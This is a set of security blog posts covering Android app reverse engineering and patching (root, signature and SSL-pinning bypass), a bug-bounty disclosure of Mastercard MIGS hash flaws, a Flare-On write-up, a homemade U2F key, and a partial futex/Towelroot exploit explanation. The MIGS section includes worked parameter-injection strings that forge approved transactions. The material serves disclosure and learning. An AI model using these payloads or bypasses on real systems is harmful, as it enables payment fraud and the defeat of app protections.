Before doing anything manually, there are several deobfuscator tools and website that can help many obfuscation cases. One of them is APK Deguard. It only works with APK file up to 16 Mb, so if you have a lot of asset files, just delete the assets to get within the limit. This tool can recognize libraries, so you will sometimes get perfectly reconstructed method and class names. Unfortunately, there are also bugs: some variables are methods just disappear from a class. And sometimes it generates classes with 4 bytes in size (just the word: null).

I tried several other tools that looked promising, such as simplify (really promising, but when I tested it, it’s really slow). I also tried: Dex-Oracle (it didn’t work). JADX also has some simple renamer for obfuscated names, but it was not enough for this case.

Every time I found a tool that doesn’t work, I usually spend some time to see if I can make it work. In the end, sometimes manual way is the best.

Use XPosed Framework

In some cases, using XPosed framework is nice, I can log any methods, or replace existing methods. One thing that I don’t quite like is that we need to do reboot (or soft reboot) every time we update the modules.

There are also modules such as JustTrustMe that works with many apps to bypass SSL Pinning check. But it doesn’t work with all apps. For example, last time I checked didn’t work for Instagram (but of course, someone could have patched it now to make it work again).  RootCloak also works to hide root from most apps, but this module hasn’t been updated for quite some time.

Sadly for the app that I tested, both tools didn’t work, the app was still able to detect that the device is rooted, and SSL pinning is still not bypassed.

Use Frida

Frida is also an interesting tool that works most of the time. Some interesting scripts were already written or Frida, for example: appmon.

Both Frida and XPosed have a weakness in tracing execution inside a method. For example we cant print a certain value in the middle of a method.

Unpack and Repack

This is the very basic thing: we will check whether the app checks for its own signature. Initially, I use a locked bootloader, unrooted,  real device (not an emulator). We can unpack the app using apktool:

apktool d app.apk
cd app
apktool b

Re-sign the dist/app.apk and install it on the device. In my case: the app won’t run: just a toast displaying: “App is not official”.

Find Raw Strings

We can use:

grep -r const-string smali/

To extract all strings in the code. In my case: I was not able to find many strings. On the string that I did find, it was used for loading class. It means that: we need to be careful when renaming a class: it could be referenced from somewhere else as a string.

Add Logging Code

With some effort, we can debug a smali project, but I prefer debug logging for doing two things: deobfuscating string and for tracing execution.

To add debugging, I created a Java file which I then compile to smali. The method can print any java Object. First, add the smali file for debugging to the smali directory.

To insert logging code manually, we just need to add:

invoke-static {v1}, LLogger;->printObject(Ljava/lang/Object;)V

replace v1 with the register that we want to print.

Most of the times, the deobfuscator method has the same parameter and return everywhere, in this case, the signature is:

.method private X(III)Ljava/lang/String;

We can write a script that:

  1. Finds deobfuscation method
  2. Inject a call to log the String

Printing the result string in the deobfuscate method is easy, but we have a problem: where (which line, which file) does the string comes from?

We can add logging code with more information like this:

const-string v1, "Line 1 file http.java"    
invoke-static {v1}, LMyLogger;->logString(Ljava/lang/String;)V

But it would require unused register for storing string (complicated, need to track which registers are currently unused), or we could increase local register count and use last register (doesn’t work if method already used all the registers).

I used another approach: we can use a Stack Trace to trace where this method is called. To identify the line, we just add new “.line” directive in the smali file before calling the deobfuscate method. To make the obfuscated class name easier to recognize, add a “.source” at the top of the smali. Initially we don’t know yet what the class do, so just give a unique identifier using uuid.

Tracing Startup

In Java, we can create static initializer, and it will be executed (once) when the class is used the first time. We should add logging code at beginning of <clinit>.

class Test {    
static { System.out.println("test"); }
}

I used UUID here (I randomly generate UUID and just put it as constant string in every class) that will helps me work with obfuscated name.

class Test {    
static {
System.out.println("c5922d09-6520-4b25-a0eb-4f556594a692"); }
}

If that message appears in logcat, then we know that the class is called/used. I could do something like this to edit the name:

vi $(grep -r UUID smali|cut -f 1 -d ':' )

Or we can also setup a directory full of UUIDS with symbolic link to the original file.

Writing new smali code

We can easily write simple smali code by hand, but for more complicated code we should just write in Java, and convert it back to smali. It is also a good idea to make sure it works on the device.

javac *.java
dx --dex --output=classes.dex *.class
zip Test.zip classes.dex
apktool d Test.zip

Now we get a smali that we can inject (copy to the smali folder)

This approach can also be used to test part of code from the app itself. We can extract smali code, add main, and run it.

adb push Test.zip /sdcard/
adb shell ANDROID_DATA=/sdcard dalvikvm -cp /sdcard/Test.zip NameOfMainClass

Think in Java level

There are several classes in the app that  extracts a dex file from a byte array to a temporary name, and then removes the file. The array is encrypted and the filename is random. First thing that we want to know is: is this file important? Will we need to patch it?

To keep the file, we can just patch the string deobfuscator: if it returns “delete”, we just return “canRead”. The signature of the method is compatible which is “()Z” (a function that doesn’t receive parameter and returns boolean).

It turns out that replacing the file (for patching) is a bit more difficult. Its a bit complicated looking at the smali code, but in general this is what happens:

  1. It generates several random unicode character using SecureRandom (note that because this is a “secure” random, altering the seed of SecureRandom won’t give you predictable file names)
  2. It decrypts the built in array into a zip file in memory
  3. It reads the zip file from a certain fixed offset
  4. It deflates the zip file manually
  5. It writes the decompressed result to a random dex file name generated at step 1
  6. It loads the dex file
  7. It deletes the temporary dex file

I tried patching the byte array, but then I also need to adjust a lot of numbers inside (sizes and offsets). After thinking in Java level, the answer is just to create a new Java code that can do what we want. So this is what I did instead:

I created a class named: FakeOutputStream, then patched the code so instead of finding java.io.FileOutputStream, it will load FakeOutputStream.

The FakeOutputStream will write the original code to /sdcard/orig-x-y, with x and y is the offset and size AND instead it will load the content of /sdcard/fake-x-y and write it to the temporary file.

Using this: when I first run the app, it will generate /sdcard/orig-x-y, and I can reverse engineer the generated DEX. I can also modify the dex file, and push it as /sdcard/fake-x-y, and that file will be loaded instead.

Time to Patch

After we can decrypt all file contents, we can start patching things, such as removing root check, package signature check, debugger check, SSL pinning check, etc.

Having the dex file outside of the main APK has an advantage: we can easily test adding or replacing method just by replacing the dex file outside the app.

 

Mastercard Internet Gateway Service: Hashing Design Flaw

Last year I found a design error in the MD5 version of the hashing method used by Mastercard Internet Gateway Service. The flaw allows modification of transaction amount.  They have awarded me with a bounty for reporting it. This year, they have switched to HMAC-SHA256, but this one also has a flaw (and no response from MasterCard).

If you just want to know what the bug is, just skip to the Flaw part.

What is MIGS?

When you pay on a website, the website owner usually just connects their system to an intermediate payment gateway (you will be forwarded to another website). This payment gateway then connects to several payments system available in a country. For credit card payment, many gateways will connect to another gateway (one of them is MIGS) which works with many banks to provide 3DSecure service.

How does it work?

The payment flow is usually like this if you use MIGS:

  1. You select items from an online store (merchant)
  2. You enter your credit card number on the website
  3. The card number, amount, etc is then signed and returned to the browser which will auto POST to intermediate payment gateway
  4. The intermediate payment gateway will convert the format to the one requested by MIGS, sign it (with MIGS key), and return it to the browser. Again this will auto POST, this time to MIGS server.
  5. If 3D secure not requested, then go to step 6. If 3D secure is requested, MIGS will redirect the request to the bank that issues the card, the bank will ask for an OTP, and then it will generate HTML that will auto POST data to MIGS
  6. MIGS will return a signed data to the browser, and will auto POST the data back to the intermediate Gateway
  7. Intermediate Gateway will check if the data is valid or not based on the signature. If it is not valid, then error page will be generated
  8. Based on MIGS response, payment gateway will forward the status to the merchant

Notice that instead of communicating directly between servers, communications are done via user’s browser, but everything is signed. In theory, if the signing process and verification process is correct then everything will be fine. Unfortunately, this is not always the case.

Flaw in the MIGS MD5 Hashing

This bug is extremely simple. The hashing method used is:

MD5(Secret + Data)

But it was not vulnerable to hash length extension attack (some checks were done to prevent this). The data is created like this: for every query parameter that starts with vpc_, sort it, then concatenate the values only, without delimiter. For example, if we have this data:

Name: Joe
Amount: 10000
Card: 1234567890123456

vpc_Name=Joe&Vpc_Amount=10000&vpc_Card=1234567890123456

Sort it:

vpc_Amount=10000
vpc_Card=1234567890123456
vpc_Name=Joe

Get the values, and concatenate it:

100001234567890123456Joe

Note that if I change the parameters:

vpc_Name=Joe&Vpc_Amount=1&vpc_Card=1234567890123456&vpc_B=0000

Sort it:

vpc_Amount=1
vpc_B=0000
vpc_Card=1234567890123456
vpc_Name=Joe

Get the values, and concatenate it:

100001234567890123456Joe

The MD5 value is still the same. So basically, when the data is being sent to MIGS, we can just insert additional parameter after the amount to eat the last digits, or to the front to eat the first digits, the amount will be slashed, and you can pay a 2000 USD MacBook with 2 USD.

Intermediate gateways and merchant can work around this bug by always checking that the amount returned by MIGS is indeed the same as the amount requested.

MasterCard rewarded me with 8500 USD for this bug.

Flaw in the  HMAC-SHA256 Hashing

The new HMAC-SHA256 has a flaw that can be exploited if we can inject invalid values to intermediate payment gateways. I have tested that at least one payment gateway (Fusion Payments) have this bug. I was rewarded 500 USD from Fusion Payments. It may affect other Payment gateways that connect to MIGS.

In the new version, they have added delimiters (&) between fields,  added field names and not just values, and used HMAC-SHA256.  For the same data above, the hashed data is:

Vpc_Amount=10000&vpc_Card=1234567890123456&vpc_Name=Joe

We can’t shift anything, everything should be fine. But what happens if a value contains & or = or other special characters?

Reading this documentation, it says that:

Note: The values in all name value pairs should NOT be URL encoded for the purpose of hashing.

The “NOT” is my emphasis. It means that if we have these fields:

Amount=100
Card=1234
CVV=555

It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555)

And if we have this (amount contains the & and =)

Amount=100&Card=1234
CVV=555

It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555)

The same as before. Still not really a problem at this point.

Of course, I thought that may be the documentation is wrong, may be it should be encoded. But I have checked the behavior of the MIGS server, and the behavior is as documented. May be they don’t want to deal with different encodings (such as + instead of %20).

There doesn’t seem to be any problem with that, any invalid values will be checked by MIGS and will cause an error (for example invalid amount above will be rejected).

But I noticed that in several payment gateways, instead of validating inputs on their server side, they just sign everything it and give it to MIGS. It’s much easier to do just JavaScript checking on the client side, sign the data on the server side, and let MIGS decide whether the card number is correct or not, or should the CVV be 3 or 4 digits, is the expiration date correct, etc. The logic is: MIGS will recheck the inputs, and will do it better.

On Fusion Payments, I found out that it is exactly what happened: they allow any characters of any length to be sent for the CVV (only checked in JavaScript), they will sign the request and send it to MIGS.

Exploit

To exploit this we need to construct a string which will be a valid request, and also a valid MIGS server response. We don’t need to contact MIGS server at all, we are forcing the client to sign a valid data for themselves.

A basic request looks like this:

vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

and a basic response from the server will look like this:

vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

In the Fusion Payment’s case, the exploit is done by injecting  vpc_CardSecurityCode (CVV)

vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999%26vpc_Message%3DApproved%26vpc_OrderInfo%3DORDERINFO%26vpc_ReceiptNo%3D722819658213%26vpc_TransactionNo%3D2000834062%26vpc_TxnResponseCode%3D0%26vpc_Z%3Da&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

The client/payment gateway will generate the correct hash for this string

Now we can post this data back to the client itself (without ever going to MIGS server), but we change it slightly so that the client will read the correct variables (most client will only check forvpc_TxnResponseCode, and vpc_TransactionNo):

vpc_AccessCode=9E33F6D7%26vpc_Amount%3D25%26vpc_Card%3DVisa%26vpc_CardExp%3D1717%26vpc_CardNum%3D4599777788889999%26vpc_CardSecurityCode%3D999&vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_Z=a%26vpc_OrderInfo%3DORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256

Note that:

  1. This will be hashed the same as the previous data
  2. The client will ignore vpc_AccessCode and the value inside it
  3. The client will process the vpc_TxnResponseCode, etc and assume the transaction is valid

It can be said that this is a MIGS client bug, but the hashing method chosen by MasterCard allows this to happen, had the value been encoded, this bug will not be possible.

Response from MIGS

MasterCard did not respond to this bug in the HMAC-SHA256. When reporting I have CC-ed it to several persons that handled the previous bug. None of the emails bounced. Not even a “we are checking this” email from them. They also have my Facebook in case they need to contact me (this is from the interaction about the MD5 bug).

Some people are sneaky and will try to deny that they have received a bug report, so now when reporting a bug, I put it in a password protected post (that is why you can see several password-protected posts in this blog). So far at least 3 views from MasterCard IP address (3 views that enter the password).  They have to type in a password to read the report, so it is impossible for them to accidentally click it without reading it. I have nagged them every week for a reply.

My expectation was that they would try to warn everyone connecting to their system to check and filter for injections.

Flaws In Payment Gateways

As an extra note: even though payment gateways handle money, they are not as secure as people think. During my pentests  I found several flaws in the design of the payment protocol on several intermediate gateways. Unfortunately, I can’t go into detail on this one(when I say “pentests”, it means something under NDA).

I also found flaws in the implementation. For example Hash Length Extension Attack, XML signature verification error, etc. One of the simplest bugs that I found is in Fusion Payments. The first bug that I found was: they didn’t even check the signature from MIGS. That means we can just alter the data returned by MIGS and mark the transaction as successful. This just means changing a single character from F (false) to 0 (success).

So basically we can just enter any credit card number, got a failed response from MIGS, change it, and suddenly payment is successful. This is a 20 million USD company, and I got 400 USD for this bug.  This is not the first payment gateway that had this flaw, during my pentest I found this exact bug in another payment gateway. Despite the relatively low amount of bounty, Fusion Payments is currently the only payment gateway that I contacted that is very clear in their bug bounty program, and is very quick in responding my emails and fixing their bugs.

Conclusion

Payment gateways are not as secure as you think. With the relatively low bounty (and in several cases that I have reported: 0 USD), I am wondering how many people already exploited bugs in payment gateways.

Short write-up for Flare-On 2016

Fireeye has published the full write-up from the authors of the challenges, and at the time I wrote this, there is already one complete write-up (this) and I think many more will come. So instead of doing another full write-up, I will just write down things that I did differently and/or different tools that I used to solve the challenges.

Level 1

You can also use command line tr to use alternate base64 characters

echo x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q| tr ZYXABCDEFGHIJKLMNOPQRSTUVWzyxabcdefghijklmnopqrstuvw0123456789+/ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/|base64 -d

Level 2

Same as most people: I just patched the executable to let it do the decryption

Level 3

Same as others: copy the memory after it is decrypted and do a bruteforce on it.

Level 4

I wrote a python script to find the longest call chain and call in that order.

I didn’t know that the decryption result supposed to be an executable that calls the beep() (“The decrypted data is a simple executable that makes a series of calls to the Beep API. “) . What I did find was just the string usetheforceluke!, and I searched the web for star wars theme song. And this one fits perfectly. I guess I was just very lucky.

Level 5

Instead of creating a disassembler, I reimplemented the emulator (if it had been a Linux binary, I would have tried WCC), and Identify the comparison points.

Initially I just manually try to find the requested values, but then I got bored and I just brute force every character and see if it would reach the next comparison point.

Level 6

I did it like everyone else.

Level 7

This is the first time I reversed a Go binary. I learned a lot by looking at the source code of gofrontend (especially the libgo part).

Level 8

I realized immediately that this is a DOS Code (from the name: Chiemera). I used Dosbox with heavy debugger (this forum post helps a lot).

Level 9

The first two levels can easily be solved using NoFuserEx and any .NET decompiler (I used ilspy).

I was not able to fix the third level with NoFuserEx, so I used reflection to load the third layer, then disassemble the instructions (using method.GetInstructions()). The pattern of the problem is the same as the first two layers, so I just need to find a reference to a field in StringUtils and find the reverse of the MD5.

Level 10

I used tshark to split the PCAP streams, and just used Chrome to reverse the Javascript part. It took a while before I found that we need to read this blog post to solve the Diffie Helman problem.

For the first part of the flash, I used JPEX open source flash decompiler. There a button to deobfuscate an SWF and that helped a lot.

Throughout the flash challenge, I didn’t use any native debugger , so I didn’t use both solution in “Searching Memory” in the official writeup page 26. Instead I used RABCDasm to disassemble and reassemble the ABC (actionscript byte code).

I created a new class to post data to a local URL, compiled the class, extract the byte code and copy it to the target.

amxmlc url.as
abcexport url.swf
rm -rf url-0
rabcdasm url-0.abc
cp url-0/*asm target-0

On top of the target-0.main.asasm add:

#include "url.script.asasm"

     getlex 		 QName(PackageNamespace(""), "url")
     pushbyte		 1
     callpropvoid	 QName(PackageNamespace(""), "testSendNumber"),1

Another example to send a byte array:

      dup #duplicate stack 
      getlex 		 QName(PackageNamespace(""), "url")
      swap #swap stack to correct the order
      callpropvoid	 QName(PackageNamespace(""), "testSendBA"),1 

On the last part, after we get the last .SWF, JPEXS is too slow to decompile the method. To solve this, I used RABCDasm again and use a simple python script to remove junk codes from the bytecode, rebuild the SWF then decompiled it with JPEXS.

I was a bit disappointed on this last challenge because I think it requires a bit guessing on the Imgur URL. I found the URL immediately, but I didn’t realize that it was important (I thought it was just an easter egg) until I saw the *size* of the image.

Conclusion

This year’s challenge was much harder than last year, I had much fun and I learned a lot from solving the challenges.

Teensy LC U2F key

Around beginning of last month, GitHub users can buy a special edition U2F security keys for 5 USD (5000 keys were available), and I got two of them. Universal 2nd Factor (U2F) is an open authentication standard that strengthens and simplifies two-factor authentication using specialized USB or NFC devices.

A U2F USB key is a second factor authentication device so it doesn’t replace our password. To login to a website, we need to enter our username and password, AND the U2F USB key. To check for user presence (to prevent malware from accessing the key without user consent), the device usually has a button that needs to be pressed when logging in.

Currently Google (Gmail, Google Drive, etc), Github, and Dropbox supports U2F devices, and we can also add support to our own site or apps using plugins or accessing the API directly (plugin for WordPress is available).

After receiving the keys, I got curious and started to read the U2F specifications. The protocol is quite simple, but so far I haven’t been able to find an implementation of a U2F key device using existing microcontrollers (Arduino or anything else). The U2F protocol uses ECC signing and I found that there is already a small ECC library for AVR and ARM (micro-ecc). It supports ECDSA with P-256 curve required by U2F.

IMG_5470

A U2F device is actually just a USB HID Device, so I will need something that I can easily program as an HID device. The easiest device to program that I have is Teensy LC. I tested compiling the micro-ecc library, and found out that it results in about 15 kilobytes of code, so Teensy LC should be OK (it has 64 kbyte flash, and 8KB of RAM). Teensy LC is also very small, it’s ideal if someday I want to put a case around it.

I can’t find an easy way to add new USB device using Teensyduino, so I decided to just patch the usb_desc.h, the only changes needed was to change the RAWHID_USAGE_PAGE to 0xf1d0 and RAWHID_USAGE to 0x01. I changed the PRODUCT_NAME to “Teensyduino U2FHID” just to make it easy to check that this works. The nice thing is: this doesn’t break anything (all code using RawHID would still run with this changes), and we can still see our code output using the virtual serial port provided by Teensyduino.

#elif defined(USB_RAWHID)
  #define VENDOR_ID		0x16C0
  #define PRODUCT_ID		0x0486
//  #define RAWHID_USAGE_PAGE	0xFFAB  // recommended: 0xFF00 to 0xFFFF
//  #define RAWHID_USAGE		0x0200  // recommended: 0x0100 to 0xFFFF
  #define RAWHID_USAGE_PAGE	0xf1d0  // recommended: 0xFF00 to 0xFFFF
  #define RAWHID_USAGE		0x01  // recommended: 0x0100 to 0xFFFF

  #define MANUFACTURER_NAME	{'T','e','e','n','s','y','d','u','i','n','o'}
  #define MANUFACTURER_NAME_LEN	11
  #define PRODUCT_NAME		{'T','e','e','n','s','y','d','u','i','n','o',' ','U','2','F','H','I','D'}

The U2F protocol is actually quite simple. When we want to use the hardware U2F key in a webapp (or desktop app), we need to add the USB key that we have to the app database. Practically, in the website, you would choose a menu that says “Add device” or “register new device”.

When you choose the register/add device, the app will send a REGISTER request to they hardware U2F USB key with a unique appid (for web app, this consist of domain name and port). The hardware U2F key will generate a private/public key pair specific for this app id, and the hardware U2F key will respond by sending a “key handle” and a “public key” to the app. If we have several usernames in an app/website, we can use a single hardware U2F key to be used for all accounts (the “key handle” will be different for each account).

Next time the user wants to login, the app/webapp will send authentication request to the hardware U2F key. In practice, when logging in, the website will request you to plug the hardware U2F key and press the button in the hardware key.

The app will send a random challenge and the appid (to identify which app it is), and the “key handle” (so the hardware U2F key will know which private key to use to sign the request). The hardware U2F key will reply with the same random challenge signed with the private key corresponding with the “key handle”, and it will also increase a counter (the counter is to prevent re-play attack and cloning attack).

There are two ways the hardware U2F key can keep track of which private key to use for a “key handle”: first one is to store a mapping of key handle to private key in a storage in the hardware U2F key, and when an app asks for a specific key handle, it can look up the private key in the storage. The second method is easier, and doesn’t require any storage, but slightly less secure: the “key handle” actually contains the private key itself (in encrypted form, otherwise anyone can send the request). Since the Teensy LC only contains 128 of EPROM, I used the second approach.

Google provides U2F reference code including something to test USB U2F keys. I started using this to test my implementation step by step using HidTest and U2Ftest. In retrospect this was not really necessary to get a working U2F key for websites. There are cases that just wouldn’t happen normally, and sometimes the test requires strange assumption (for example: as far as I know nothing in the specification says that key handle size must be at least 64 bytes in size).

Teensy LC doesn’t provide a user button (just a reset button), and I don’t want to add a button to it (it wouldn’t be portable anymore). So I just implemented everything without button press. This is insecure, but it’s ok for me for testing. For “key handle” I use a very simple xor encryption with fixed key which is not very secure. If you want a more secure approach, you can use a more complicated method.

Most of the time implementing your own device is not more secure than buying commercial solution, but sometimes it has some advantages over commercial solutions. For example: most devices that I know of doesn’t have a ‘reset’ mechanism. So if for instance you are caught having a device, and they have access to a website data, they can prove from your device that you have an account in that site (there is a protocol to check if a given key handle is generated by a hardware U2F device).

In our custom solution we can reset/reflash our own device (or just change the encryption key)) and have a plausible deniability that we are not related to that site (the suggestion in the U2F specification was to destroy a device if you no longer want to associate a website with your device if your device doesn’t have reset mechanism).

teensy

I have published my source in github in case someone wants to implement something similar for other devices (or to improve my implementation). I have included the micro-ecc source because I want to experiment by removing some unneeded functions to reduce the code size (for example: we always use uncompressed point representation for U2F, we only use a single specific Curve, we never need to verify a signature, etc). You should change the key “-YOHANES-NUGROHO-YOHANES-NUGROHO-” for your own device (must be 64 characters if you want security). There are still a lot of things that I want to explore regarding the U2F security, and having a device that I can hack will make things easier.

Update: some people are really worried about my XOR method: you can change the key and make it 64 bytes long. It’s basically a one-time-pad (xoring 64 bytes, with some unknown 64 bytes). If you want it to be more secure: change the XOR into anything else that you want (this is something that is not specified in the standard). Even a Yubico U2F device is compromised if you know the master key, in their blog post, they only mentioned that the master key is generated during manufacturing, and didn’t say if they also keep a record of the keys.

Update again: this is not secure, see http://www.makomk.com/2015/11/10/breaking-a-teensy-u2f-implementation/.

Regarding the buttonless approach: it’s really easy to add them. In my code, there is an ifdef for SIMULATE_BUTTON. It will just pretend that the button was not pressed on first request, and pressed on second request. Just change it so that it really reads a physical button.

Exploiting the Futex Bug and uncovering Towelroot

The Futex bug (CVE-2014-3153) is a serious bug that affects most Linux kernel version and was made popular by geohot in his towelroot exploit. You can read the original comex report at hackerone. Others have succesfully implemented this (this one for example), but no public exploit source code is available.

This post will describe in detail about what exactly is the futex bug, how to exploit the futex bug, and also explains how towelroot works and what the modstring in Towelroot v3 actually do. Following the footsteps of other security researchers, I will not give a full source code to the exploit. By giving enough details, I hope programmers can learn and appreciate the exploit created for this bug. By not releasing the source, I hope this should stop most script kiddies. There will be some small details that I will gloss over (about the priority list manipulation), so it will require some thinking and experimentation to implement the exploit.

One thing to note: I did some kernel programming, but never written a kernel exploit before, so this is my first time, I hope this is a good write up for a newbie exploit writer like me. Distributing the exploit source code will be useful only to handful of people, but writing about it will be useful to all programmers interested in this.

Towelroot is not opensource, and the binary is protected from reverse engineering by compiling it with llvm-obfuscator. When I started, I tried using 64 bit kernel on my desktop, and was not successful because I can’t find a syscall that can alter the stack in the correct location. So I decided to do a blackbox reverse engineering by looking at syscalls used by towelroot. Since (I think) I know how towelroot works, I will discuss about it, and I hope it will help people to understand/modify modstrings used in towelroot v3.

If you are an exploit hacker, just jump to “on to the kernel” part. The initial part is only for those unexperienced in writing exploits.

Before exploiting this bug we need to understand what the bug is. In short, the bug is that there is a data structure in the stack, that is part of a priority list that is left there and can be manipulated. This is very vague for most of programmers, so lets break it down. You need to understand what a stack is and how it works.

The Stack

A stack is a block of memory set aside for local variable, for parameter passing, and for storing return address of a procedure call. Usually when we talk about stack and exploits, we try to alter the return address and redirect it to another address and probably do ROP (Return Oriented Programming). This is not the case with this bug, so forget about that. Even though this bug is about futex, this is also not a race condition bug.

Stack memory is reused accross procedure calls (not cleared) . See this simple example:


You can compile then run it:

gcc test.c -o mytest

Note: just compile normally, don’t use any optimization level (-Ox):

$./mytest
local foo is 10
local foo is 12

As you can see, both procedures uses exactly the same stack layout. Both local uses the same stack location. When bar is called, it writes to the same stack location used by “foo” for its local variable. This simple concept will play a role in understanding the bug.

Next topic is about linked list. Usually a pointer based data structure uses heap for storing the elements (We don’t use stack because we want the elements to be “permanent” accross calls), but sometimes we can just use the stack, as long as we know that the element is going to be removed when the function exits, this will save time in allocation/deallocation. Here is an example of a made up problem where we put in an element located in the stack then removing it again before returning.

In that example, if we don’t remove the element and we return, the app will likely crash when the stack content is altered then the list js manipulated. That is the simplified version of the bug in the userland.

To exploit the bug, we need a good understanding of how futex work, especially the PI (Priority Inheritance Futex). There are very good papers that you can read about this topic. The first one is: Futexes Are Tricky, this will give a you an idea about what futex is and how it works. The other one is Requeue-PI: Making Glibc Condvars PI-Aware, this will give you a very thorough details about the PI futex implementation in the kernel. I suggest someone trying to implement the exploit to read at least the second paper.

For those of you who are not that curious to read the papers, I will try to simplify it: when there are tasks waiting for a pi futex, the kernel creates a priority list of those tasks (to be precise, it creates a waiter structure for that task) . A priority list is used because we want to maintain a property of a pi futex, i.e, task with a high priority will be waken first even though it waits after a low priority task.

The node of this priority list is stored in the kernel stack. Note that when a task waits for a futex, it will wait in kernel context, and will not return to user land. So the use of kernel stack here completely makes sense. Please note that before kernel 3.13, the kernel uses plist, but after 3.13 it uses rb_node for storing the list. If you want to exploit latest kernel, you will need to handle that.

This is actually where the bug is: there is a case where the waiter is still linked in the waiter list and the function returns. Please note that a kernel stack is completely separate from user stack. You can not influence kernel stack just by calling your own function in the userspace. You can manipulate kernel stack value (like the first example) by doing syscall.

If you don’t understand much about kernel, you can imagine a syscall is like a remote call to another machine: the execution on the other “machine” will use a separate stack from the one that you use in your local (user mode code). Note that this analogy doesn’t really hold when we talk about exploiting memory space.

A simpler bug

Before going into the detail about how the bug can be exploited in the kernel. I will present a much smaller and easier to understand userland code that has a similar bug. After you understand this, I will show how the kernel exploit works based on the same principle:

First, you will need to compile this in 32 bit mode, so the sizeof int is the same as the size of pointer (32 bit), don’t use any optimization when compiling.

gcc -m32 list1.c

Then run the resulting executable without any parameters it will print something like this:

$ ./mylist 
we will use pos: -1
Not a buggy function
Value = Alpha
Value = Beta
Value = --END OF LIST--
a buggy function, here is the location of value on stack 0xffd724a4
Value = Alpha
Value = Beta
Value = --END OF LIST--
location of buf[0] is 0xffd72488
location of buf[1] is 0xffd7248c
location of buf[2] is 0xffd72490
location of buf[3] is 0xffd72494
location of buf[4] is 0xffd72498
location of buf[5] is 0xffd7249c
location of buf[6] is 0xffd724a0
location of buf[7] is 0xffd724a4
location of buf[8] is 0xffd724a8
location of buf[9] is 0xffd724ac
Value = Alpha
Value = Beta
Value = --END OF LIST--

Notice the location of value on stack, which in this example is 0xffd724a4. Notice that it is the same as the address of buf[7]. Now run the test again, like this:

$./mylist 7 HACKED
we will use pos: 7
Not a buggy function
Value = Alpha
Value = Beta
Value = --END OF LIST--
a buggy function, here is the location of value on stack 0xffd3bd34
Value = Alpha
Value = Beta
Value = --END OF LIST--
Value = Alpha
Value = Beta
Value = HACKED

There is no assignment of the value “HACKED” to the list element, but it printed the word “HACKED”. Why this works? because we assign to the exact memory location in stack where “value” was stored. Also note that the location printed is now different because of ASLR, but because the position is the same in the stack, element number 7 is also relocated to the same address.

Now try out if you use other value than 7, also try a very small or very large value. You can also try this with stack protector on:

gcc -m32 -fstack-protector list1.c

The element that matched the address will be different (may be 7 becomes 8 or 6), but the exploit will still work if you adjust the element number with the matching address.

In this example, I made a very convenient function that makes the “exploit” easy (named a_function_to_exploit). In the real world, if we want to modify certain location in stack, we need to find a function that has a correct “depth” (that is: the stack size usage is at least the same as the function that we are trying to exploit), and we need to be able to manipulate the value on that stack depth. To understand about stack depth, you can comment the dummy_var1/dummy_var2/dummy_var3, compile, and see the stack address change. You can also see that if the function is optimized, certain variables are no longer in stack (moved to registers if possible).

Writing using list

Once you know how to manipulate an element of the list, you can write to certain memory address. On all exploits what you want to do is to write something to an address. To make this part short and to show my point, I will give an example for a simple linked list. If we have this:

Assume that we can control the content of n, we can write almost arbitrary value to arbitrary address. Lets assume that prev is in offset 4 of the node, and next is in offset 8. Please note that this structure assignment:

A->B = C;

is the same as:

*(A + offset_B) = C;

Lets assume we want to overwrite memory at location X with value Y. First prepare a fake node for the “next”, this fakenext is located at memory location Y (the location of the fake node is the value that we want to write), Of course this is limited to accessible memory space (so segmentation fault will not happen).

If we just want to change a value from 0 (for example: a variable containing number 0 if something is not allowed) to any non zero number (something is allowed), then we can use any number (we don’t even need a fake element, just a valid pointer to the “next” element).

n->next = fakenext;
n->prev = X-8

so when we call, this is what happens:

(n->next)->prev = n->prev;
(n->prev)->next = n->next

since n->next points to our fakenode

(fakenode)->prev = n->prev;
(n->prev)->next = fakenode

You can read more about this kind of list manipulation by searching google for heap exploits. For example, there are several articles about exploiting memory allocator in Phrack that uses list in the implementation (Vudo Malloc Tricks, Once upon a free, Advanced Doug lea’s malloc exploits and Malloc Des-Maleficarum).

These two things: that stack content can be manipulated, and that a manipulated list can be used to write to any address is the basis of the futex exploit.

On to the Kernel

Now lets go to where the bug is on the kernel.

You can also see the full code for futex_wait_requeue_pi().

In my simple userland code, there is a variable called instack that we want to manipulate, this time, we are interested in rt_waiter. In the case where futex requeue is called with uaddr1==uaddr2, the code path will cause q.rt_waiter to be NULL, but actually the waiter is still linked in the waiter list.

static int futex_requeue(u32 __user *uaddr1, unsigned int flags,u32 __user *uaddr2, int nr_wake, int nr_requeue,u32 *cmpval, int requeue_pi)

And the source code for futex_requeue()

Now we need a corresponding function for a_function_to_exploit. This syscall must be “deep” enough to touch the rt_waiter, so a syscall that doesn’t have a local variable, and doesn’t call other function is not usable.

First lets examine the function when we call it. From now on to show certain things, I will show how it looks in gdb that is connected to qemu for kernel debugging. Since I want to show things about towelroot, I am using qemu with ARM kernel. I am using this official guide for building Android kernel combined with stack overflow answer. When compiling the kernel, don’t forget to enable debug symbol. I created an Android 4.3 AVD, and started the emulator with this:


~/adt-bundle-linux/sdk/tools/emulator-arm -show-kernel -kernel arch/arm/boot/zImage -avd joeavd -no-boot-anim -no-skin -no-audio -no-window -logcat *:v -qemu -monitor telnet::4444,server -s

I can control the virtual machine via telnet localhost 444, and debug using gdb:

